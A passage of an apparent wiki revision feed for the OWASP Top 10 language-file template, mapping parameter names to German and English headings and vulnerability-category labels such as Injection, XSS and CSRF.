        | common =                        COMMON&lt;br /&gt;
        | uncommon =                      UNCOMMON&lt;br /&gt;
        | detectability =                 Detectability&lt;br /&gt;
        | impact =                        Impact&lt;br /&gt;
        | severe =                        SEVERE&lt;br /&gt;
        | moderate =                      MODERATE&lt;br /&gt;
        | minor =                         MINOR &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Threat Agents&lt;br /&gt;
        | attackVectors =                 Attack Vectors&lt;br /&gt;
        | securityWeakness =              Security Weakness&lt;br /&gt;
        | technicalImpacts =              Technical Impacts&lt;br /&gt;
        | businessImpacts =               Business Impacts&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 businessImpacts.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top_10_2013-appsec-risks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Am I Vulnerable To {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | vulnerableTo1 =                 Am I Vulnerable To&lt;br /&gt;
        | vulnerableTo2 =                 ?&lt;br /&gt;
        | howPrevent =                    How Do I Prevent {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | howPrevent1 =                   How Do I Prevent&lt;br /&gt;
        | howPrevent2 =                   ?&lt;br /&gt;
        | exampleScenarios =              Example Attack Scenarios &lt;br /&gt;
        | defendingOption =               Defending Option&lt;br /&gt;
        | against =                       against&lt;br /&gt;
        | userImpact =                    Impact to the User &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      External &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      ERROR in the 'Language File' (Use of the unused Object)&lt;br /&gt;
        | #default =                      ERROR in the 'Language File' (Use of an unknown Object)&lt;br /&gt;
     }} &amp;lt;!-- End of English --&amp;gt;&lt;br /&gt;
}}&amp;lt;/onlyinclude&amp;gt;&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=232188</id>
		<title>Template:Top 10:LanguageFile</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=232188"/>
				<updated>2017-08-11T19:10:15Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!----------------------------------------------------------------------------&amp;gt; &lt;br /&gt;
&amp;lt;!-- This File contains all the text that is used by OWASP Top 10 Templates --&amp;gt;&lt;br /&gt;
&amp;lt;!--             Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;!----------------------------------------------------------------------------&amp;gt;&lt;br /&gt;
==='''Usage:''' ===&lt;br /&gt;
This File contains all the text that is used by OWASP Top 10 Templates&amp;lt;br/&amp;gt;&lt;br /&gt;
Please leave a message to {{Template:Contact | name = Torsten Gigler | email =torsten.gigler@owasp.org | username = T.Gigler}} &lt;br /&gt;
if you liked to add a new localization&amp;lt;br&amp;gt;                     &lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
If you use an undefined language you will get English output (default language).&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |text=&amp;lt;parameter&amp;gt; &amp;lt;!-- take one of the defined parmeters, e.g. tableOfContents --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |language=&amp;lt;your language&amp;gt;   &amp;lt;!-- actually only English (=en) and German (=de) are valid parameters) --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |year=&amp;lt;year&amp;gt;   &amp;lt;!-- optional for some texts --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;}}&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
====Example:====&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile|text=tableOfContents|language=de}} =&amp;gt;&amp;lt;/nowiki&amp;gt; {{Top_10:LanguageFile|text=tableOfContents|language=de}}&lt;br /&gt;
----&lt;br /&gt;
==='''Healthcheck'''===&lt;br /&gt;
tbd.&amp;lt;br/&amp;gt;&lt;br /&gt;
In the meantime, please check:&lt;br /&gt;
* [[Top_10_2013-Table_of_Contents | English Top 10 Wiki]]&lt;br /&gt;
* [[Germany/Projekte/Top_10-2013-Inhaltsverzeichnis | German Top 10 Wiki]]&lt;br /&gt;
----&lt;br /&gt;
If you use an unknown parameter you will get the following Error message in your wiki page:&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;onlyinclude&amp;gt;{{#switch: {{{language}}}&lt;br /&gt;
   | de = &amp;lt;!-- German --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Germany/Projekte/Top 10-{{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Germany/Projekte/Top 10 fuer Entwickler-{{{year}}}&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage =               ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10-2013==&lt;br /&gt;
        | top10TmpMessageDeveloperEdition = ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10 fuer Entwickler-2013==&lt;br /&gt;
        | centerLink1 =                   [[Germany/Projekte/Top 10-2013-Inhaltsverzeichnis|2013 Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2 =                   [[Germany/Projekte/Top 10-2013-Top 10|2013 Die Top-10-Risiken]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Inhaltsverzeichnis|Top 10 fuer Entwickler-2013: Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Top 10|Die Top-10-Risiken]]&lt;br /&gt;
        | projectCategory =               [[Category: Germany/Projekte/Top 10-2013]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top 10 fuer Entwickler]] [[Category: Germany/Projekte/Top 10 fuer Entwickler-2013]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for Top 10 2013-CenterLinkTemplate --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Inhaltsverzeichnis&lt;br /&gt;
        | foreword =                      Vorwort&lt;br /&gt;
        | forewordTranslation =           Vorwort der deutschen Übersetzung&lt;br /&gt;
        | forward =                       Vorwort &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Vorwort der deutschen Übersetzung &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    Über OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright und Lizenz&lt;br /&gt;
        | introduction =                  Einleitung&lt;br /&gt;
        | releaseNotes =                  Neuerungen&lt;br /&gt;
        | risks =                         Risiken&lt;br /&gt;
        | risk =                          Risiko&lt;br /&gt;
        | subTitleApplicationRisks =      (Sicherheitsrisiken für Anwendungen)&lt;br /&gt;
        | riskLarge =                     RISIKO&lt;br /&gt;
        | applicationSecurityRisks =      Was sind Sicherheitsrisiken für Anwendungen? &lt;br /&gt;
        | theTop10 =                      Die Top-10-Risiken&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        Nächste Schritte für Software-Entwickler&lt;br /&gt;
        | whatsNextforVerifiers =         Nächste Schritte für Prüfer&lt;br /&gt;
        | whatsNextforOrganizations =     Nächste Schritte für Organisationen&lt;br /&gt;
        | noteAboutRisks =                Anmerkungen zum Risikobegriff&lt;br /&gt;
        | detailsAboutRiskFactors =       Details zu Risiko-Faktoren&lt;br /&gt;
        | appendix =                      Anlage&lt;br /&gt;
        | warnings =                      Zur Beachtung&lt;br /&gt;
        | acknowledgements =              Danksagung&lt;br /&gt;
        | attribution =                   Namensnennung/Danksagung&lt;br /&gt;
        | whatChangedFrom2010to2013 =     Was hat sich von Version 2010 zu 2013 verändert?&lt;br /&gt;
        | welcome =                       Herzlich Willkommen&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          Was sind Sicherheitsrisiken für Anwendungen?&lt;br /&gt;
        | whatsMyRisk =                   Was sind &amp;lt;u&amp;gt;meine&amp;lt;/u&amp;gt; Risiken?&lt;br /&gt;
        | references =                    Referenzen&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Etablierung und Nutzung umfassender Sicherheitsmaßnahmen&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Starten Sie jetzt mit Ihrem Anwendungssicherheits-Programm!&lt;br /&gt;
        | getOrganized =                  Organisation und Prozesse &lt;br /&gt;
        | codeReview =                    Code-Analyse&lt;br /&gt;
        | securityAndPenetrationTesting = Sicherheits- und Penetrationstests&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    Es geht nicht um Schwachstellen, sondern um Risiken&lt;br /&gt;
        | top10RiskFactorSummary =        Zusammenfassung der Top 10 Risiko-Faktoren&lt;br /&gt;
        | additionalRisksToConsider =     Weitere zu betrachtende Risiken &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Fehler in Authentifizierung und Session-Management&lt;br /&gt;
        | authentication =                Authentifizierung &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Unsichere direkte Objektreferenzen&lt;br /&gt;
        | insecureDOR =                   Unsichere direkte Objektreferenzen&lt;br /&gt;
        | securityMisconfig =             Sicherheitsrelevante Fehlkonfiguration&lt;br /&gt;
        | misconfig =                     Fehlkonfiguration&lt;br /&gt;
        | sensitiveDataExposure =         Verlust der Vertraulichkeit sensibler Daten&amp;lt;noinclude&amp;gt;ex: Sensitive Data Exposure&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | sensData =                      Sens. Data&amp;lt;noinclude&amp;gt;(tbd)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | missingFunctionLevelACL =       Fehlerhafte Autorisierung auf Anwendungsebene &amp;lt;noinclude&amp;gt;(tbd = Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | functionAcc =                   Fehlerh. Autorisierung&amp;lt;noinclude&amp;gt;(tbd = Kurzform für Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Benutzen von Komponenten mit bekannten Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = Using Components with Known Vulnerabilities)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnComponents =                Komponenten mit Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = vuln. Components)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Ungeprüfte Um- und Weiterleitungen&lt;br /&gt;
        | unvalRedirects =                Ungepr. Weiterltg.&lt;br /&gt;
        | insecureCryptographicStorage =  Kryptografisch unsichere Speicherung&lt;br /&gt;
        | failureRestrictUrlAccess =      Mangelhafter URL-Zugriffsschutz&lt;br /&gt;
        | insufficientTLProtection =      Unzureichende Absicherung der Transportschicht&lt;br /&gt;
        | inProgress =                    In Arbeit &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Anwendungs-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | appSpecific =                   Anw.-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | applicationBusinessSpecific =   Anwendungs-/&amp;lt;br&amp;gt;Geschäftsspezifisch&lt;br /&gt;
        | appBusinessSpecific =           Anw.-/&amp;lt;br&amp;gt;Geschäftsspez. &lt;br /&gt;
        | exploitability =                Ausnutzbarkeit&lt;br /&gt;
        | easy =                          EINFACH&lt;br /&gt;
        | average =                       DURCHSCHNITTLICH&lt;br /&gt;
        | difficult =                     SCHWIERIG&lt;br /&gt;
        | weakness =                      &amp;lt;!-- not used ---&amp;gt; &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt;&lt;br /&gt;
        | prevalence =                    Verbreitung&lt;br /&gt;
        | veryWidespread =                AUSSERGEWÖHNLICH HÄUFIG&lt;br /&gt;
        | widespread =                    SEHR HÄUFIG&lt;br /&gt;
        | common =                        HÄUFIG&lt;br /&gt;
        | uncommon =                      SELTEN&lt;br /&gt;
        | detectability =                 Auffindbarkeit&lt;br /&gt;
        | impact =                        Auswirkung&lt;br /&gt;
        | severe =                        SCHWERWIEGEND&lt;br /&gt;
        | moderate =                      MITTEL&lt;br /&gt;
        | minor =                         GERING  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Bedrohungsquelle&lt;br /&gt;
        | attackVectors =                 Angriffsvektor&lt;br /&gt;
        | securityWeakness =              Schwachstellen&lt;br /&gt;
        | technicalImpacts =              Technische Auswirkung&lt;br /&gt;
        | businessImpacts =               Auswirkung auf das Unternehmen&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 de threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 de attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 de securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 de technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 de businessImpacts.png  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top 10 de ApplicationSecurityRisks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt;          &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Bin ich durch {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verwundbar?&lt;br /&gt;
        | vulnerableTo1 =                 Bin ich durch&lt;br /&gt;
        | vulnerableTo2 =                 &amp;amp;nbsp;verwundbar?&lt;br /&gt;
        | howPrevent =                    Wie kann ich {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verhindern?&lt;br /&gt;
        | howPrevent1 =                   Wie kann ich &lt;br /&gt;
        | howPrevent2 =                   &amp;amp;nbsp;verhindern?&lt;br /&gt;
        | exampleScenarios =              Mögliche Angriffsszenarien &lt;br /&gt;
        | defendingOption =               Verteidigungs-Option&lt;br /&gt;
        | against =                       gegen&lt;br /&gt;
        | userImpact =                    Auswirkung(en) auf den Benutzer &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;   &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;         &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      Andere                    &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;   &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      FEHLER im 'Language File' (Aufruf des unbenutzten Objekts)&lt;br /&gt;
        | #default =                      FEHLER im 'Language File' (Aufruf des unbekannten Objekts)&lt;br /&gt;
     }} &amp;lt;!-- End of German --&amp;gt;&lt;br /&gt;
&amp;lt;noinclude&amp;gt;&lt;br /&gt;
&amp;lt;!-- English = default; so here is nothing to do --&amp;gt; &lt;br /&gt;
&amp;lt;!-- | en =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | us =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | gb =  --&amp;gt;&lt;br /&gt;
&amp;lt;/noinclude&amp;gt; | #default = &amp;lt;!-- English --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Top 10 {{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Top 10 {{{year}}} Developer Edition&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage = &lt;br /&gt;
           {{#switch: {{{year}}} &lt;br /&gt;
             | 2017 =               ==This page is outdated. It is part of the Top 10-2017 RC1 which has been rejected.&amp;lt;br/&amp;gt;==If you wish to comment, please file an [https://github.com/OWASP/Top10/issues issue on GitHub]. Changes to this page will be lost!==&amp;lt;br/&amp;gt;==More information available [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2017_Release_Candidate_1 here]].&lt;br /&gt;
             | 2013 =               &amp;lt;noinclude&amp;gt;==The Top 10-2013 Wiki is under Construction. The Content is Not Finished yet==&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
           }}&lt;br /&gt;
        | top10TmpMessageDeveloperEdition =   ==The Top 10-2013 Developer Edition Wiki is under Connstruction. The Content is Not Finished yet==&lt;br /&gt;
        | centerLink1 =                   [[Top 10 {{{year}}}-Table of Contents | {{{year}}} Table of Contents]]&lt;br /&gt;
        | centerLink2 =                   [[Top_10_{{{year}}}-Top 10|{{{year}}} Top 10 List]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Table of Contents|{{{year}}} Developer Edition-Table of Contents]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Top 10 List|{{{year}}} Developer Edition-Top 10 List]]&lt;br /&gt;
        | projectCategory =               [[Category:OWASP Top Ten Project]] [[Category:OWASP Top Ten {{{year}}} Project]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top Ten {{{year}}} Developer Edition]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Table of Contents&lt;br /&gt;
        | foreword =                      Foreword&lt;br /&gt;
        | forewordTranslation =           Foreword of the English Wiki&lt;br /&gt;
        | forward =                       Forward &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Forward of the English Wiki &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    About OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright and License&lt;br /&gt;
        | introduction =                  Introduction&lt;br /&gt;
        | releaseNotes =                  Release Notes&lt;br /&gt;
        | risks =                         Risks&lt;br /&gt;
        | risk =                          Risk&lt;br /&gt;
        | subTitleApplicationRisks =      (Application Security Risks)&lt;br /&gt;
        | riskLarge =                     RISIK&lt;br /&gt;
        | applicationSecurityRisks =      Application Security Risks&lt;br /&gt;
        | theTop10 =                      The Top 10&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        What's Next for Developers&lt;br /&gt;
        | whatsNextforVerifiers =         What's Next for Verifiers&lt;br /&gt;
        | whatsNextforSecurityTesting =   What's Next for Security Testing&lt;br /&gt;
        | whatsNextforOrganizations =     What's Next for Organizations&lt;br /&gt;
        | noteAboutRisks =                Note About Risks&lt;br /&gt;
        | OWASPTop10ApplicationSecurityRisks = OWASP Top 10 Application Security Risks&lt;br /&gt;
        | detailsAboutRiskFactors =       Details About Risk Factors&lt;br /&gt;
        | appendix =                      appendix&lt;br /&gt;
        | warnings =                      Warnings&lt;br /&gt;
        | acknowledgements =              Acknowledgements&lt;br /&gt;
        | attribution =                   Attribution&lt;br /&gt;
        | whatChangedFrom2010to2013 =     What Changed From 2010 to 2013?&lt;br /&gt;
        | welcome =                       Welcome&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          What Are Application Security Risks?&lt;br /&gt;
        | whatsMyRisk =                   What's My Risk?&lt;br /&gt;
        | references =                    References&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Establish &amp;amp; Use Repeatable Security Processes and Standard Security Controls&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Start Your Application Security Program Now&lt;br /&gt;
        | establishContinuousApplicationSecurityTesting = Establish Continuous Application Security Testing&lt;br /&gt;
        | getOrganized =                  Get Organized&lt;br /&gt;
        | codeReview =                    Code Review&lt;br /&gt;
        | securityAndPenetrationTesting = Security and Penetration Testing&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    It's About Risks, Not Weaknesses&lt;br /&gt;
        | top10RiskFactorSummary =        Top 10 Risk Factor Summary&lt;br /&gt;
        | additionalRisksToConsider =     Additional Risks to Consider  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Broken Authentication and Session Management&lt;br /&gt;
        | authentication =                Authentication &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Insecure Direct Object References&lt;br /&gt;
        | insecureDOR =                   Insecure DOR&lt;br /&gt;
        | securityMisconfig =             Security Misconfiguration&lt;br /&gt;
        | misconfig =                     Misconfig&lt;br /&gt;
        | sensitiveDataExposure =         Sensitive Data Exposure&lt;br /&gt;
        | sensData =                      Sens. Data&lt;br /&gt;
        | missingFunctionLevelACL =       Missing Function Level Access Control&lt;br /&gt;
        | functionAcc =                   Function Acc.&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Using Components with Known Vulnerabilities&lt;br /&gt;
        | vulnComponents =                vuln. Components&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Unvalidated Redirects and Forwards&lt;br /&gt;
        | unvalRedirects =                unval. Redirects&lt;br /&gt;
        | insecureCryptographicStorage =  Insecure Cryptographic Storage&lt;br /&gt;
        | failureRestrictUrlAccess =      Failure to Restrict URL Access&lt;br /&gt;
        | insufficientTLProtection =      Insufficient Transport Layer Protection&lt;br /&gt;
        | brokenAccessControl =           Broken Access Control &lt;br /&gt;
        | insufficientAttackPrevention =  Insufficient Attack Protection &lt;br /&gt;
        | underprotectedAPIs =            Underprotected APIs&lt;br /&gt;
        | accessCtrl =                    Access Ctrl&lt;br /&gt;
        | attackProt  =                   Attack Prot.&lt;br /&gt;
        | ApiProt =                       API Prot.&lt;br /&gt;
        | inProgress =                    In Progress &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Application Specific&lt;br /&gt;
        | appSpecific =                   App Specific&lt;br /&gt;
        | applicationBusinessSpecific =   Application / Business Specific  &lt;br /&gt;
        | appBusinessSpecific =           App / Business Specific       &lt;br /&gt;
        | exploitability =                Exploitability&lt;br /&gt;
        | easy =                          EASY&lt;br /&gt;
        | average =                       AVERAGE&lt;br /&gt;
        | difficult =                     DIFFICULT&lt;br /&gt;
        | weakness =                      Weakness &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt; &lt;br /&gt;
        | prevalence =                    Prevalence&lt;br /&gt;
        | veryWidespread =                VERY WIDESPREAD&lt;br /&gt;
        | widespread =                    WIDESPREAD&lt;br /&gt;
        | common =                        COMMON&lt;br /&gt;
        | uncommon =                      UNCOMMON&lt;br /&gt;
        | detectability =                 Detectability&lt;br /&gt;
        | impact =                        Impact&lt;br /&gt;
        | severe =                        SEVERE&lt;br /&gt;
        | moderate =                      MODERATE&lt;br /&gt;
        | minor =                         MINOR &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Threat Agents&lt;br /&gt;
        | attackVectors =                 Attack Vectors&lt;br /&gt;
        | securityWeakness =              Security Weakness&lt;br /&gt;
        | technicalImpacts =              Technical Impacts&lt;br /&gt;
        | businessImpacts =               Business Impacts&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 businessImpacts.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
